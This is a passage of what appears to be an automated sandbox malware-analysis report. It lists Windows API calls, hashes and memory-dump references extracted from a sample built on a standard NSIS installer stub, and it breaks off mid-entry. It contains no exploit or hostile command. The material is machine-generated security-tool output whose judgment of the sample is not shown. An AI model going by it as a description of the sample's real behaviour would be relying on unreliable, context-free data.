                                                            • Part of subcall function 004031CC: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                                          • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004026F3
                                                          • GlobalFree.KERNEL32(?), ref: 0040272C
                                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 0040273E
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402745
                                                            • Part of subcall function 00402F1F: SetFilePointer.KERNEL32(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
                                                            • Part of subcall function 00402F1F: WriteFile.KERNEL32(00000000,004128A0,?,000000FF,00000000,004128A0,00004000,00409130,00409130,?,?,00000000,00000000,?,?), ref: 00402FD2
                                                          • DeleteFileA.KERNEL32(?), ref: 00402771
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
                                                          • String ID:
                                                          • API String ID: 64603807-0
                                                          • Opcode ID: 6cec495910a9e88075d1f7eb5e869c869e7b815a94df44103aaa50bb30bd6671
                                                          • Instruction ID: 39d681308be84b49fc043c668352bfd213fb34ea520f048123e5f65a43450375
                                                          • Opcode Fuzzy Hash: 6cec495910a9e88075d1f7eb5e869c869e7b815a94df44103aaa50bb30bd6671
                                                          • Instruction Fuzzy Hash: 77218C71C00118BFCF116FA4CD88CAEBE79EF08364B10423AF520772E0C6795D419BA8
                                                          APIs
                                                          • lstrlenA.KERNEL32(0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
                                                          • lstrlenA.KERNEL32(00402C51,0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
                                                          • lstrcatA.KERNEL32(0041F4D8,00402C51,00402C51,0041F4D8,00000000,00000000,00000000), ref: 00405038
                                                          • SetWindowTextA.USER32(0041F4D8,0041F4D8), ref: 0040504A
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: cea32b253d1ac3703ad26de6388232052e4db73ad36ec02bf46cfe5f988bdfec
                                                          • Instruction ID: 23c8d3588392bc678d7246373841442171ea5a50e124834ae8740ae97285bd87
                                                          • Opcode Fuzzy Hash: cea32b253d1ac3703ad26de6388232052e4db73ad36ec02bf46cfe5f988bdfec
                                                          • Instruction Fuzzy Hash: FD218C71900508BADB119FA5DD84ADFBFA9EF14354F14807AF504B6290C2799A41CFA8
                                                          APIs
                                                          • DestroyWindow.USER32(?,00000000), ref: 00402BF2
                                                          • GetTickCount.KERNEL32 ref: 00402C10
                                                          • wsprintfA.USER32 ref: 00402C3E
                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
                                                            • Part of subcall function 00404FDC: lstrcatA.KERNEL32(0041F4D8,00402C51,00402C51,0041F4D8,00000000,00000000,00000000), ref: 00405038
                                                            • Part of subcall function 00404FDC: SetWindowTextA.USER32(0041F4D8,0041F4D8), ref: 0040504A
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C62
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C70
                                                            • Part of subcall function 00402BBE: MulDiv.KERNEL32(?,?,?), ref: 00402BD3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: dd16a8e3e29a7078c9400af3a90b17e12947c4b40babff7d6952d3a04bc15912
                                                          • Instruction ID: 37d10fed78b44bbf962512fa666ce1a12177f0d23356d60e90fa74daf698f4f0
                                                          • Opcode Fuzzy Hash: dd16a8e3e29a7078c9400af3a90b17e12947c4b40babff7d6952d3a04bc15912
                                                          • Instruction Fuzzy Hash: 900165B0949614ABDB216F64AE4DE9F7B78BB01701714C037FA01B11E1C6B8D541CB9E
                                                          APIs
                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048C2
                                                          • GetMessagePos.USER32 ref: 004048CA
                                                          • ScreenToClient.USER32(?,?), ref: 004048E4
                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048F6
                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040491C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                          • Instruction ID: add3c7f7873227bd74a4bce1351eac807b502806bceb4e0d6bae9f806a4b5eb6
                                                          • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                          • Instruction Fuzzy Hash: 61014C75D00218BAEB11DBA4DC85BFFBBBCAB55711F10412BBA10B62C0C7B4A9018BA5
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
                                                          • wsprintfA.USER32 ref: 00402B91
                                                          • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: 99857fb9a0cb22b8e24de3565838d35ba34270d242ce7178ee6913b7a03a7076
                                                          • Instruction ID: 1ce9201bfa48cab7b8fa553f1801af8382b39519b903b04a6adfa3bfa778fb21
                                                          • Opcode Fuzzy Hash: 99857fb9a0cb22b8e24de3565838d35ba34270d242ce7178ee6913b7a03a7076
                                                          • Instruction Fuzzy Hash: 0DF01D70900208ABEF215F61CD4ABEE3779EB00345F00803AFA06B51D0D7F8AA558B9A
                                                          APIs
                                                          • CharNextA.USER32(?,*?|<>/":,00000000,00429000,0042A400,0042A400,00000000,004031EF,0042A400,77583410,004033C9), ref: 00405FB4
                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
                                                          • CharNextA.USER32(?,00429000,0042A400,0042A400,00000000,004031EF,0042A400,77583410,004033C9), ref: 00405FC6
                                                          • CharPrevA.USER32(?,?,0042A400,0042A400,00000000,004031EF,0042A400,77583410,004033C9), ref: 00405FD6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":
                                                          • API String ID: 589700163-165019052
                                                          • Opcode ID: 8e6880dbf60680850995486114707e5442f3544b6a214aee6d9330f98436af3b
                                                          • Instruction ID: 7b30a10291eb0396c8f4e95b118cc70be9f64314849ede57e52aca42a9cf7d7a
                                                          • Opcode Fuzzy Hash: 8e6880dbf60680850995486114707e5442f3544b6a214aee6d9330f98436af3b
                                                          • Instruction Fuzzy Hash: 9E11C451808B962AEB3216344C44F77BF99CF56760F18007BE9C4B22C2D67C5C429B6D
                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,004093C8,00429800,00000000,00000000,00000031), ref: 0040177E
                                                          • CompareFileTime.KERNEL32(-00000014,?,004093C8,004093C8,00000000,00000000,004093C8,00429800,00000000,00000000,00000031), ref: 004017A8
                                                            • Part of subcall function 00405CF1: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405CFE
                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
                                                            • Part of subcall function 00404FDC: lstrcatA.KERNEL32(0041F4D8,00402C51,00402C51,0041F4D8,00000000,00000000,00000000), ref: 00405038
                                                            • Part of subcall function 00404FDC: SetWindowTextA.USER32(0041F4D8,0041F4D8), ref: 0040504A
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID:
                                                          • API String ID: 1941528284-0
                                                          • Opcode ID: e5c8897feeb3b96df54089b5182e8aadeaf99870982f07bb07acc14f8d7a8d61
                                                          • Instruction ID: 6271ed47795bff7848a1184a65af423285d25a4990901b96ed448ffc086cd7e6
                                                          • Opcode Fuzzy Hash: e5c8897feeb3b96df54089b5182e8aadeaf99870982f07bb07acc14f8d7a8d61
                                                          • Instruction Fuzzy Hash: 4E41C371900615BBCF10BFA5DC46EAF3669DF41368B20823BF521B20E1D63C8A419B6D
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: 2b305445c74f0eaebb71fa9482cec2fce57418a6903f029cea569060b2a4f6aa
                                                          • Instruction ID: 87201a58af63731299c065c60a73f314b5aa52cedce30dc2bb0b82caebebd8ee
                                                          • Opcode Fuzzy Hash: 2b305445c74f0eaebb71fa9482cec2fce57418a6903f029cea569060b2a4f6aa
                                                          • Instruction Fuzzy Hash: 7B114F71A00008FFDF219F90DE48EAA3B7DEB44349B104076FA05B11A0D7B59E55AF69
                                                          APIs
                                                          • GetDlgItem.USER32(?), ref: 00401CD0
                                                          • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                          • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 729fc4278e862243959d7ad856f7c73244b6852cfe4ffc3fdd7b269795ac9902
                                                          • Instruction ID: 68903ef9478fc0d920f95a79cd5396482650d24808bb52901199de5d2149753e
                                                          • Opcode Fuzzy Hash: 729fc4278e862243959d7ad856f7c73244b6852cfe4ffc3fdd7b269795ac9902
                                                          • Instruction Fuzzy Hash: 06F062B2A05114BFD701DBA4EE88CAF77BCEB44301B008576F501F2091C7389D019B79
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401D29
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                          • CreateFontIndirectA.GDI32(0040A7D0), ref: 00401DA1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: ef1b64666616b25dcccf261ce108287f0db7ff00b6f9d57c68185c71429f3349
                                                          • Instruction ID: 34424dcacaa19df80ac017e3b34477b9893efc0acb885e50cf323370767d2cbe
                                                          • Opcode Fuzzy Hash: ef1b64666616b25dcccf261ce108287f0db7ff00b6f9d57c68185c71429f3349
                                                          • Instruction Fuzzy Hash: 05011271948340AFE701DBB0AE0AB9A7F74EB19705F108435F141B72E2C6B954159B2F
                                                          APIs
                                                          • lstrlenA.KERNEL32(0041FCF8,0041FCF8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,004046E5,000000DF,0000040F,00000400,00000000), ref: 00404853
                                                          • wsprintfA.USER32 ref: 0040485B
                                                          • SetDlgItemTextA.USER32(?,0041FCF8), ref: 0040486E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: 7485b6386e81bef30f100a14aa500a9732bcfe78fc9357feba844f7cfa967d5f
                                                          • Instruction ID: 1dbe8f306e20f990bcdfb4b2d97c48a080c9d40feb998d0653c6b80998781608
                                                          • Opcode Fuzzy Hash: 7485b6386e81bef30f100a14aa500a9732bcfe78fc9357feba844f7cfa967d5f
                                                          • Instruction Fuzzy Hash: CE11347360012437CB1062699C49EEF3249CBC2334F24823BFA25F71D1E9788C5282E8
                                                          APIs
                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
                                                          • Instruction ID: c8505a4ed1fbcfe48898eca751f608fe424cacc25c72cee6cab93c7adb8e4515
                                                          • Opcode Fuzzy Hash: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
                                                          • Instruction Fuzzy Hash: 742190B1A44208BFEF41AFB4CD4AAAE7BB5EF40344F14453EF541B61D1D6B89A40E728
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 0040304F
                                                            • Part of subcall function 004031CC: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                                          • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00402F52,?,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000), ref: 00403082
                                                          • WriteFile.KERNEL32(0040A8A0,?,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,?,00000000,00000000,?,?), ref: 0040313C
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,?,00000000,00000000,?,?,?,00402ECB), ref: 0040318E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$CountTickWrite
                                                          • String ID:
                                                          • API String ID: 2146148272-0
                                                          • Opcode ID: e969f51fb91c1eed4d8a9bc9024c2eb0b6bf39f0f502a3b67258e99aab1be33f
                                                          • Instruction ID: 2060b4db2a59e7e801be0a10e6f45457beaa1fbeaf8038f8ae1418eaad325724
                                                          • Opcode Fuzzy Hash: e969f51fb91c1eed4d8a9bc9024c2eb0b6bf39f0f502a3b67258e99aab1be33f
                                                          • Instruction Fuzzy Hash: 4B414F725052019FDB10BF29EE849663BFCFB4431A715863BE810BA2E4D7389952CB5E
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00000001,?), ref: 00401F93
                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
                                                            • Part of subcall function 00404FDC: lstrcatA.KERNEL32(0041F4D8,00402C51,00402C51,0041F4D8,00000000,00000000,00000000), ref: 00405038
                                                            • Part of subcall function 00404FDC: SetWindowTextA.USER32(0041F4D8,0041F4D8), ref: 0040504A
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                          • LoadLibraryExA.KERNEL32(00000000,?,?,00000001,?), ref: 00401FA3
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,?,00000001,?), ref: 0040201D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2987980305-0
                                                          • Opcode ID: aa6b3be14d6657a1a1ac7f00cef48fe0d665c01fe79f9500f27f09d5bd23833b
                                                          • Instruction ID: 3f2733cfc3de05a67066b1a81d0209d8d10e728cfd6e940428cc792ad37f86ee
                                                          • Opcode Fuzzy Hash: aa6b3be14d6657a1a1ac7f00cef48fe0d665c01fe79f9500f27f09d5bd23833b
                                                          • Instruction Fuzzy Hash: 9A21EB72904215BBCF10BFA4CE4DA6E79B0AB44358F60823BF601B62D1D7BD4D41EA5E
                                                          APIs
                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                                          • lstrlenA.KERNEL32(00409BC8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,00409BC8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                                          • RegCloseKey.ADVAPI32(?,?,?,00409BC8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                          Memory Dump Source
